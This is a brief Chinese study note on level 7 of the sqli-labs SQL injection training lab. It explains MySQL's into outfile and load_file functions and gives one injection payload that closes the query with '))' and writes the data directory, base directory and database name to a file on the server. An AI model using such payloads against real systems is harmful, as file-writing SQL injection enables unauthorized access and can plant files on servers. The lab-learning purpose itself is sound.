参考资料:
1、sqli-labs 第七关 多命通关攻略_sql-list靶场第七题-CSDN博客
2、文件操作函数有两个:into outfile、load_file
into outfile用法:select “值” into outfile “文件路径和文件名”
load_file用法:select load_file( “文件路径”)
知识点:mysql文件操作函数
老规矩:还是要判断闭合点。这里判断注入点参考给出的参考资料第一个链接,里面写的很详细,很正确。
1、?id=-1')) union select @@datadir,@@basedir,database() into outfile "C:\\1.txt" --+